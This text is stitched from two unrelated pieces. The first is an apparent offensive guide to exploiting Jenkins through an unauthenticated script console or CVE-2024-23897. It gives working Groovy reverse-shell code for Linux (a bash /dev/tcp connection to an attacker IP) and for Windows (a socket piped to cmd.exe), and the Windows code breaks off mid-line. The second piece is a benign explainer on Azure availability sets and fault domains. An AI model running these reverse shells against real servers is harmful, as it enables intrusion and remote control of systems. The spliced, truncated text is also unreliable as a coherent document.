Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
An availability set is a logical grouping of two or more VMs that helps to keep the application hosted in the Azure cloud, available during planned or unplanned maintenance.
Planned events such as patch security vulnerabilities, improve performance, and add or update features can be considered as a Planned Maintenance. Where as, an unplanned maintenance are events that involves a hardware failure in the data center, or a power outage or a disk failure etc. On such events, cloud providers needs to ensure that their customers are not affected by any of these events. To achieve this in the Azure cloud, one of the method is to use availability sets. VMs that are part of an availability set automatically switch to a working physical server so the VM continues to run. The group of virtual machines that share common hardware are in the same fault domain. A fault domain is essentially a rack of servers. It provides the physical separation of your workload across different power, cooling, and network hardware that support the physical servers in the data center server racks. In the event the hardware that supports a server rack becomes unavailable, only that rack of servers is affected by the outage.
For example, during the monthly patching activity, the VMs are required to reboot. Using Availability Sets, one VM can be rebooted at a time and the other will be up achieving fault tolerance and zero downtime.